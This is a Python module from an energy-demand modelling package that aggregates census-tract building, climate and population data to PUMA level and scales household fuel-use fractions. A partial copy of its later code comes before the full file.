int/str year: year to use within label when creating columns. :return: (*pandas.DataFrame*) -- fractions of natural gas, fuel oil and kerosone, propane, and electricity used for space heating, hot water, cooking, and other in residential and commercial buildings. """ # Calculate res fractions of fuel usage based off ACS puma_fuel household data puma_df["frac_sh_res_natgas_acs"] = hh_fuels["hh_utilgas"] / hh_fuels["hh_total"] for f in ["fok", "othergas", "coal", "wood", "solar", "elec", "other", "none"]: puma_df[f"frac_sh_res_{f}_acs"] = hh_fuels[f"hh_{f}"] / hh_fuels["hh_total"] region_map = {state: r for r, states in const.regions.items() for state in states} puma_region_groups = puma_df.groupby(puma_df["state"].map(region_map)) for c in const.classes: # Compute area fraction for each fuel type (column) in each region (index) area_fractions = puma_region_groups.apply( lambda x: pd.Series( { f: ( ( x[f"frac_sh_res_{f}_acs"] * x[f"{c}_area_{const.base_year}_m2"] ).sum() / x[f"{c}_area_{const.base_year}_m2"].sum() ) for f in const.fuel } ) ) # Scale per-PUMA values to match target regional values (calculated externally) uselist = ["sh", "dhw", "other"] if c == "res" else ["sh", "dhw", "cook"] for u in uselist: area_fraction_targets = pd.read_csv( os.path.join(data_dir, f"frac_target_{u}_{c}.csv"), index_col=0, ) down_scale = area_fraction_targets / area_fractions up_scale = (area_fraction_targets - area_fractions) / (1 - area_fractions) for r in const.regions: for f in const.fuel: pre_scaling = puma_region_groups.get_group(r)[ f"frac_sh_res_{f}_acs" ] if down_scale.loc[r, f] <= 1: scaled = pre_scaling * down_scale.loc[r, f] else: scaled = pre_scaling + up_scale.loc[r, f] * (1 - pre_scaling) puma_df.loc[pre_scaling.index, f"frac_{f}_{u}_{c}_{year}"] = scaled # Sum coal, wood, solar and other fractions for frac_com_other named_sh_com_fuels = {"elec", "fok", "natgas", "othergas"} named_sh_com_cols = [f"frac_{f}_sh_com_{year}" for f in named_sh_com_fuels] puma_df[f"frac_other_sh_com_{year}"] = 1 - puma_df[named_sh_com_cols].sum(axis=1) # Copy residential space heating columns to match new column naming convention fossil_fuels = {"natgas", "othergas", "fok"} for c in const.classes: uselist = ["sh", "dhw", "other"] if c == "res" else ["sh", "dhw", "cook"] for u in uselist: fossil_cols = [f"frac_{f}_{u}_{c}_{year}" for f in fossil_fuels] puma_df[f"frac_ff_{u}_{c}_{year}"] = puma_df[fossil_cols].sum(axis=1) return puma_df def puma_timezone_latlong(timezones, pumas): """Assign timezone and lat/long to each puma. :param geopandas.DataFrame timezones: US timezones. :param geopandas.DataFrame pumas: US pumas. :return: (*pandas.Series*) -- timezone for every puma. :return: (*pandas.DataFrame*) -- latitude and longitude for every puma. """ puma_timezone = gpd.overlay(pumas, timezones.to_crs("EPSG:4269")) puma_timezone["area"] = puma_timezone.area puma_timezone.sort_values("area", ascending=False, inplace=True) puma_timezone = puma_timezone.drop_duplicates(subset="GEOID10", keep="first") puma_timezone.sort_values("GEOID10", ascending=True, inplace=True) puma_lat_long = pd.DataFrame( { "puma": "puma_" + pumas["GEOID10"], "latitude": [float(pumas["INTPTLAT10"][i]) for i in range(len(pumas))], "longitude": [float(pumas["INTPTLON10"][i]) for i in range(len(pumas))], } ) puma_lat_long = puma_lat_long.set_index("puma") return puma_timezone["tzid"], puma_lat_long if __name__ == "__main__": data_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), "data") # Load ACS fuel data puma_fuel = pd.read_csv(os.path.join(data_dir, "puma_fuel.csv"), index_col="puma") # Load tract_puma_mapping tract_puma_mapping = pd.read_csv( os.path.join(data_dir, "tract_puma_mapping.csv"), index_col="tract" ) # Load tract-level data for General Building Stock area for residential, commercial and industral classes tract_gbs_area = pd.read_csv( os.path.join(data_dir, "tract_gbs_area.csv"), index_col="tract" ) # Load tract-level data for heating and cooling degree day normals tract_degday_normals = pd.read_csv( os.path.join(data_dir, "tract_degday_normals.csv"), index_col="tract" ) # Load tract-level data for population tract_pop = pd.read_csv(os.path.join(data_dir, "tract_pop.csv"), index_col="tract") puma_data_unscaled = aggregate_puma_df( puma_fuel["state"], tract_puma_mapping, tract_gbs_area, tract_degday_normals, tract_pop, ) puma_data = scale_fuel_fractions(puma_fuel, puma_data_unscaled) # Add time zone information puma_timezones = pd.read_csv( os.path.join(data_dir, "puma_timezone.csv"), index_col="puma" ) puma_data["timezone"] = puma_timezones["timezone"] # Add latitude and longitude information puma_lat_long = pd.read_csv( os.path.join(data_dir, "puma_lat_long.csv"), index_col="puma" ) puma_data["latitude"], puma_data["longitude"] = ( puma_lat_long["latitude"], puma_lat_long["longitude"], ) # Add residential AC penetration acpen_b = 0.00117796 acpen_n = 1.1243 puma_data["AC_penetration"] = 1 - np.exp( -acpen_b * puma_data["cdd65_normals"] ** acpen_n ) puma_data.to_csv(os.path.join(data_dir, "puma_data.csv"))
prereise/gather/demanddata/bldg_electrification/puma_data_agg.py
import os import geopandas as gpd import numpy as np import pandas as pd from prereise.gather.demanddata.bldg_electrification import const def aggregate_puma_df( puma_states, tract_puma_mapping, tract_gbs_area, tract_degday_normals, tract_pop ): """Scale census tract data up to puma areas. :param pandas.DataFrame puma_states: mapping of puma to state. :param pandas.DataFrame tract_puma_mapping: tract to puma mapping. :param pandas.DataFrame tract_gbs_area: General Building Stock area for residential, commercial, industrial areas by tract :param pandas.DataFrame tract_degday_normals: heating and cooling degree day normals by tract :param pandas.DataFrame tract_pop: population by tract :return: (*pandas.DataFrame*) -- population; residential, commercial, industrial areas; heating degree days; cooling degree days; residential space heating household fuel fractions. """ # Set up puma_df data frame puma_df = puma_states.to_frame() # Combine tract-level data into single data frame with only census tracts with building area data tract_data = pd.concat( [tract_gbs_area, tract_degday_normals, tract_pop], axis=1, join="inner" ) tract_data = tract_data.loc[:, ~tract_data.columns.duplicated()] # Group tracts by PUMA for aggregration grouped_tracts = tract_data.groupby(tract_puma_mapping["puma"]) # Sum population and GBS areas; store in data frame puma_df.loc[grouped_tracts.groups.keys(), "pop"] = grouped_tracts["pop"].sum() puma_df.loc[grouped_tracts.groups.keys(), "res_area_gbs_m2"] = grouped_tracts[ "res_area_gbs_m2" ].sum() puma_df.loc[grouped_tracts.groups.keys(), "com_area_gbs_m2"] = grouped_tracts[ "com_area_gbs_m2" ].sum() puma_df.loc[grouped_tracts.groups.keys(), "ind_area_gbs_m2"] = grouped_tracts[ "ind_area_gbs_m2" ].sum() # Population-weighted average hdd, cdd, and acpen tract_data["pop_hdd65_normals"] = tract_data["pop"] * tract_data["hdd65_normals"] tract_data["pop_cdd65_normals"] = tract_data["pop"] * tract_data["cdd65_normals"] puma_df.loc[grouped_tracts.groups.keys(), "hdd65_normals"] = ( grouped_tracts["pop_hdd65_normals"].sum() / grouped_tracts["pop"].sum() ) puma_df.loc[grouped_tracts.groups.keys(), "cdd65_normals"] = ( grouped_tracts["pop_cdd65_normals"].sum() / grouped_tracts["pop"].sum() ) # Load RECS and CBECS area scales for res and com resscales = pd.read_csv(os.path.join(data_dir, "area_scale_res.csv")) comscales = pd.read_csv(os.path.join(data_dir, "area_scale_com.csv")) # Compute GBS areas for state groups in RECS and CBECS resscales["GBS"] = [ puma_df.query("state in @s")["res_area_gbs_m2"].sum() * const.conv_m2_to_ft2 * const.conv_ft2_to_bsf for s in resscales.fillna(0).values.tolist() ] comscales["GBS"] = [ puma_df.query("state in @s")["com_area_gbs_m2"].sum() * const.conv_m2_to_ft2 * const.conv_ft2_to_bsf for s in comscales.fillna(0).values.tolist() ] # Compute scalar for GBS area to base year area correspondingg to RECS/CBECS # and assuming a constant annual growth rate resscales["area_scalar"] = ( resscales[f"RECS{const.recs_date_1}"] * ( ( resscales[f"RECS{const.recs_date_2}"] / resscales[f"RECS{const.recs_date_1}"] ) ** ( (const.base_year - const.recs_date_1) / (const.recs_date_2 - const.recs_date_1) ) ) / resscales["GBS"] ) comscales["area_scalar"] = ( comscales[f"CBECS{const.cbecs_date_1}"] * ( ( comscales[f"CBECS{const.cbecs_date_2}"] / comscales[f"CBECS{const.cbecs_date_1}"] ) ** ( (const.base_year - const.cbecs_date_1) / (const.cbecs_date_2 - const.cbecs_date_1) ) ) / comscales["GBS"] ) # Scale puma area from gbs to base year for state in const.state_list: state_row_scale_res = resscales[resscales.eq(state).any(1)].reset_index() state_row_scale_com = comscales[comscales.eq(state).any(1)].reset_index() res_area_scalar = state_row_scale_res["area_scalar"][0] com_area_scalar = state_row_scale_com["area_scalar"][0] puma_df.loc[puma_df["state"] == state, f"res_area_{const.base_year}_m2"] = ( puma_df[puma_df["state"] == state]["res_area_gbs_m2"] * res_area_scalar ) puma_df.loc[puma_df["state"] == state, f"com_area_{const.base_year}_m2"] = ( puma_df[puma_df["state"] == state]["com_area_gbs_m2"] * com_area_scalar ) return puma_df def scale_fuel_fractions(hh_fuels, puma_df, year=const.base_year): """Scale census tract data up to puma areas. :param pandas.DataFrame hh_fuels: household fuel type by puma. :param pandas.DataFrame puma_df: output of :func:`aggregate_puma_df`. :param int/str year: year to use within label when creating columns. :return: (*pandas.DataFrame*) -- fractions of natural gas, fuel oil and kerosone, propane, and electricity used for space heating, hot water, cooking, and other in residential and commercial buildings. """ # Calculate res fractions of fuel usage based off ACS puma_fuel household data puma_df["frac_sh_res_natgas_acs"] = hh_fuels["hh_utilgas"] / hh_fuels["hh_total"] for f in ["fok", "othergas", "coal", "wood", "solar", "elec", "other", "none"]: puma_df[f"frac_sh_res_{f}_acs"] = hh_fuels[f"hh_{f}"] / hh_fuels["hh_total"] region_map = {state: r for r, states in const.regions.items() for state in states} puma_region_groups = puma_df.groupby(puma_df["state"].map(region_map)) for c in const.classes: # Compute area fraction for each fuel type (column) in each region (index) area_fractions = puma_region_groups.apply( lambda x: pd.Series( { f: ( ( x[f"frac_sh_res_{f}_acs"] * x[f"{c}_area_{const.base_year}_m2"] ).sum() / x[f"{c}_area_{const.base_year}_m2"].sum() ) for f in const.fuel } ) ) # Scale per-PUMA values to match target regional values (calculated externally) uselist = ["sh", "dhw", "other"] if c == "res" else ["sh", "dhw", "cook"] for u in uselist: area_fraction_targets = pd.read_csv( os.path.join(data_dir, f"frac_target_{u}_{c}.csv"), index_col=0, ) down_scale = area_fraction_targets / area_fractions up_scale = (area_fraction_targets - area_fractions) / (1 - area_fractions) for r in const.regions: for f in const.fuel: pre_scaling = puma_region_groups.get_group(r)[ f"frac_sh_res_{f}_acs" ] if down_scale.loc[r, f] <= 1: scaled = pre_scaling * down_scale.loc[r, f] else: scaled = pre_scaling + up_scale.loc[r, f] * (1 - pre_scaling) puma_df.loc[pre_scaling.index, f"frac_{f}_{u}_{c}_{year}"] = scaled # Sum coal, wood, solar and other fractions for frac_com_other named_sh_com_fuels = {"elec", "fok", "natgas", "othergas"} named_sh_com_cols = [f"frac_{f}_sh_com_{year}" for f in named_sh_com_fuels] puma_df[f"frac_other_sh_com_{year}"] = 1 - puma_df[named_sh_com_cols].sum(axis=1) # Copy residential space heating columns to match new column naming convention fossil_fuels = {"natgas", "othergas", "fok"} for c in const.classes: uselist = ["sh", "dhw", "other"] if c == "res" else ["sh", "dhw", "cook"] for u in uselist: fossil_cols = [f"frac_{f}_{u}_{c}_{year}" for f in fossil_fuels] puma_df[f"frac_ff_{u}_{c}_{year}"] = puma_df[fossil_cols].sum(axis=1) return puma_df def puma_timezone_latlong(timezones, pumas): """Assign timezone and lat/long to each puma. :param geopandas.DataFrame timezones: US timezones. :param geopandas.DataFrame pumas: US pumas. :return: (*pandas.Series*) -- timezone for every puma. :return: (*pandas.DataFrame*) -- latitude and longitude for every puma. """ puma_timezone = gpd.overlay(pumas, timezones.to_crs("EPSG:4269")) puma_timezone["area"] = puma_timezone.area puma_timezone.sort_values("area", ascending=False, inplace=True) puma_timezone = puma_timezone.drop_duplicates(subset="GEOID10", keep="first") puma_timezone.sort_values("GEOID10", ascending=True, inplace=True) puma_lat_long = pd.DataFrame( { "puma": "puma_" + pumas["GEOID10"], "latitude": [float(pumas["INTPTLAT10"][i]) for i in range(len(pumas))], "longitude": [float(pumas["INTPTLON10"][i]) for i in range(len(pumas))], } ) puma_lat_long = puma_lat_long.set_index("puma") return puma_timezone["tzid"], puma_lat_long if __name__ == "__main__": data_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), "data") # Load ACS fuel data puma_fuel = pd.read_csv(os.path.join(data_dir, "puma_fuel.csv"), index_col="puma") # Load tract_puma_mapping tract_puma_mapping = pd.read_csv( os.path.join(data_dir, "tract_puma_mapping.csv"), index_col="tract" ) # Load tract-level data for General Building Stock area for residential, commercial and industral classes tract_gbs_area = pd.read_csv( os.path.join(data_dir, "tract_gbs_area.csv"), index_col="tract" ) # Load tract-level data for heating and cooling degree day normals tract_degday_normals = pd.read_csv( os.path.join(data_dir, "tract_degday_normals.csv"), index_col="tract" ) # Load tract-level data for population tract_pop = pd.read_csv(os.path.join(data_dir, "tract_pop.csv"), index_col="tract") puma_data_unscaled = aggregate_puma_df( puma_fuel["state"], tract_puma_mapping, tract_gbs_area, tract_degday_normals, tract_pop, ) puma_data = scale_fuel_fractions(puma_fuel, puma_data_unscaled) # Add time zone information puma_timezones = pd.read_csv( os.path.join(data_dir, "puma_timezone.csv"), index_col="puma" ) puma_data["timezone"] = puma_timezones["timezone"] # Add latitude and longitude information puma_lat_long = pd.read_csv( os.path.join(data_dir, "puma_lat_long.csv"), index_col="puma" ) puma_data["latitude"], puma_data["longitude"] = ( puma_lat_long["latitude"], puma_lat_long["longitude"], ) # Add residential AC penetration acpen_b = 0.00117796 acpen_n = 1.1243 puma_data["AC_penetration"] = 1 - np.exp( -acpen_b * puma_data["cdd65_normals"] ** acpen_n ) puma_data.to_csv(os.path.join(data_dir, "puma_data.csv"))
0.764892
0.402744